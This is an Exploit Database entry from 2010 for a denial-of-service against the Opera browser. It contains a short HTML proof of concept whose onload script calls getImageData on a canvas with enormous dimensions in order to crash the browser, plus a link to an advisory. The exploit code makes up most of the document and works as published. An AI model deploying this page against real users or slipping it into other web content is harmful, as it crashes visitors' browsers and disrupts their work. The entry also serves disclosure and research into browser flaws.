Opera Denial of Service by <canvas> Element



EDB-ID: 14349 CVE: N/A OSVDB-ID: N/A
Author: Pouya Daneshmand Published: 2010-07-12 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next 
Opera.html
<html>

<body onload="Opera()">

<script language=JavaScript>

function Opera() {

canvas = document.getElementById("canvas");

ctx = canvas.getContext("2d");

ctx.getImageData(0,0,0x20000,0x20000);

}

</script>

<canvas id=canvas width=10 height=10></canvas>

</body>

</html>




Original Advisory:

http://pouya.info/blog/userfiles/vul/OperaCC.pdf






Comments

No comments so far